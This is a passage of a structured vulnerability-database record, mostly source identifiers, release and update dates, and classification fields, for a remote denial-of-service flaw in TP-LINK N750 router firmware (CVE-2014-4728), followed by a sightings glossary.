"id": "VHN-72669"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "PACKETSTORM",
"id": "128343"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"db": "VULHUB",
"id": "VHN-72669"
},
{
"db": "BID",
"id": "70037"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"db": "PACKETSTORM",
"id": "128343"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"date": "2014-09-30T00:00:00",
"db": "VULHUB",
"id": "VHN-72669"
},
{
"date": "2014-09-21T00:00:00",
"db": "BID",
"id": "70037"
},
{
"date": "2014-10-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"date": "2014-09-22T18:32:22",
"db": "PACKETSTORM",
"id": "128343"
},
{
"date": "2014-09-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"date": "2014-09-30T16:55:06.653000",
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-06260"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-72669"
},
{
"date": "2014-09-25T00:02:00",
"db": "BID",
"id": "70037"
},
{
"date": "2014-10-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-004486"
},
{
"date": "2014-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201409-1170"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-4728"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "TP-LINK N750 Wireless Dual Band Gigabit Router firmware Web Service disruption at the server (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004486"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201409-1170"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.